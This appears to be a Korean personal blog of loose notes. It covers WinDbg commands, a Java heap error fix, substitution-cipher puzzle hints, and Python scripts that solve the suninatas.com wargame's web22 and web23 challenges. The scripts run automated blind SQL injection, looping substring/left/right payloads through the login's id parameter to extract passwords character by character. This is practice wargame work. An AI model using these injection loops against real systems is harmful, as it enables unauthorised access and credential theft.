Ludwings

한.. 한달정도 틈틈히 했는데 재밌었다... 처음으로 올클해봣슴 걔꿀!

님들도해보세여 재밋음 저같은 허접도 올클가능! 추천해요 11등!

suninatas.com

푸는데 시간이 생각보다 오래 걸렸는데.  내가 많이 헤맨 이유는 문제를 너무 어렵게 생각했기 때문이다..

알파벳 하나에 치환되는 알파벳하나. 이렇게 하나하나 되어있었는데 내가 생각한건 n 개의 알파벳이 모여서 다른 한개로 치환 된다고 생각해서 시간이 오래 걸렸는데..

점수를 보고 정신차리고 그냥 한글자로 생각하고 풀었다..

HINT

1. bpn ; n은 뭔지 알거라고 생각하고.. 맨마지막에 들어가는 알파벳이 e.인 3글자 단어..? the 또는 are..

2. 맨마지막의 ?ee?  ; ee양옆에 같은 알파벳이 들어가는 단어가 과연 얼마나 있을까..

1. 설치

2. 심볼 설정

3. 명령어 검색

windbg 검색으로 쉽게 설치가능.

windbg symbol을 설정해야 분석할때 쉽게 알아볼수 있다.

- http://infoages.tistory.com/1146

windbg 명령어 / 계속 추가

lmvm -> 모듈 정보 확인
u -> un assemble
chkimg -> 변경되었나확인

lm m name
lm a address
-> 모듈 확인

dds - > display dword
dps

!dh -f module -> 헤더 정보

JAVA로 실행시에 아래와 같은 오류가 난다면?

Error occurred during initialization of VM
Could not reserve enough space for object heap

메세지 그대로 VM 을 초기화시기기위한 heap 영역이 부족한거라고 한다.

해결방법 :

환경변수를 추가해준다.

시스템 속성 - 고급 - 환경변수 - 새로만들기

이름 : _JAVA_OPTIONS

값 : -Xmx512M

확인결과 성공햇다!

>>> param = 'v'
>>> num="0123456789"
for i in range(2,9):
 full_param="http://www.suninatas.com/Part_one/web23/web23.asp?id=%27+or%28left%28pw%2C"+num[i]+"%29%3D%27"+param
 for j in range(len(words)):
  tmp = full_param+words[j]+"%27%29--&pw=1"
  resp = opener.open(tmp)
  str = resp.read().decode('utf-8')
  if str.find('OK')>-1:
   param = param+words[j]
   print(words[j])
   break

>>> param=""
>>> for i in range(1,9):
 full_param="http://www.suninatas.com/Part_one/web23/web23.asp?id=%27+or%28right%28pw%2C"+num[i]+"%29%3D%27"
 for j in range(len(words)):
  tmp = full_param+words[j]+param+"%27%29--&pw=1"
  resp = opener.open(tmp)
  str = resp.read().decode('utf-8')
  if str.find('OK')>-1:
   param = words[j]+param
   print(words[j])
   break

오른쪽

admin' and(substring(pw,1,1)='a')--

OK admin

http://www.suninatas.com/Part_one/web22/web22.asp?id=admin' and(substring(pw,1,1)='a')--&pw=1

http://www.suninatas.com/Part_one/web22/web22.asp?id=guest%27+and%28substring%28pw%2C1%2C1%29%3D%27g%27%29--&pw=1

>>> import urllib.request
>>> resp = urllib.request.urlopen("http://www.suninatas.com/member/mem_action.asp?Hid=ludwings&Hpw=")
>>> resp.read()
>>> words = "abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-~"
>>> param = "id=admin' and(substring(pw,1,1)='a')--&pw=1"

====

1. login session 유지

>>> import http.cookiejar
>>> import urllib.request
>>> import urllib.parse
>>>
>>> cj = http.cookiejar.CookieJar()
>>> opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
>>> resp = opener.open("http://www.suninatas.com/member/mem_action.asp?Hid=ludwings&Hpw=")
>>> print(resp.read())
b'\r\n<script language="javascript">\r\n\tvar auth1 = "1";\r\n\tvar auth  = auth1*1;\r\n\r\n\tif (auth == "0"){\r\n\t\talert("Plese Login First!");\r\n\t\tparent.document.location.href="../member/mem_action.asp?licen=login_out";\r\n\t}else{\r\n\t\talert("Welcome To SuNiNaTaS!");\r\n\t\tparent.document.location.href="../main/main.asp";\r\n\t}\r\n</script>'

2. buffer to string
str.decode('utf-8')

>>> words = "abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+=-~[]?;:'><.,`/{}"
>>> param1 = 'http://www.suninatas.com/Part_one/web22/web22.asp?id=admin%27+and%28substring%28pw%2C1%2C1%29%3D%27'
>>> param2 = '%27%29--&pw=1'
>>>

admin' and(substring(pw,n,1)=words[i])--

admin' and(substring(pw,1,1)='a')--

N1

N1c3Bilnl

3. 특수문자를 encode 해줘야해..

urllib.error.HTTPError: HTTP Error 406: Not Acceptable
>>> words = "abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$^&*()_+-~[]?:'><.,/{}"
>>> numbers="123456789"
>>> for i in range(10):
 for j in range(len(words)):
  full_param = 'http://www.suninatas.com/Part_one/web22/web22.asp?id=admin%27+and%28substring%28pw%2C'+numbers[i]+'%2C1%29%3D%27'+words[j]+param2
  resp = opener.open(full_param)
  str = resp.read()
  str2 = str.decode('utf-8')
  if str2.find('OK')>-1:
   print(words[j])
   break

이거푸는데 머 어케해야하지 하다가

인터넷에서 봣던

셜록홈즈의 춤추는 사람인가 인형인가 그거로 한번해봤다...

EEnpcqNcqNifPetVT sqcqN bdPWuQqgcqNcqNsqDfbdP_KEDeiqg_fsDeinpetKE

이렇게 되어있는데 반복으로 나오는 문자들 각각 한글자를 붙일수있겠지..

EE =
np =
sq =
cqN =
fs =
KE =
Dei =
qg =
et =
P =

근데 문자열의 시작은아마 Password Is ~~~일테니까

앞에

EE = P
np = a
sq = i
cqN = s

ifPetVT = word

이런식으로 했다..

중간에 _KEDeiqg_ 는 3글자 같은데

중간에 저런단어는 for, the, ago 등등 을 찾아볼수있는데 앞에서 한번도 나오지 않은 알파벳만 쓰인

the 같다..

그럼

password is ?? essi ??_the_?hart

이렇게되는데 힌트가 char니까 맨뒤의 물음표는 C..

저중간 4글자는 사용안된 알파벳

bfgjklnmquvxyz 들중 3개를 뽑아사용할텐데, 모음 알파벳은 u 하나남았으니 두번째 ? 는 u가될 확률이 크다..

그렇다면

?uessi?? 인데... 사용안된 알파벳으로 나올수있는 가장 높은 가능성을 지닌 단어는 "guessing" 이다.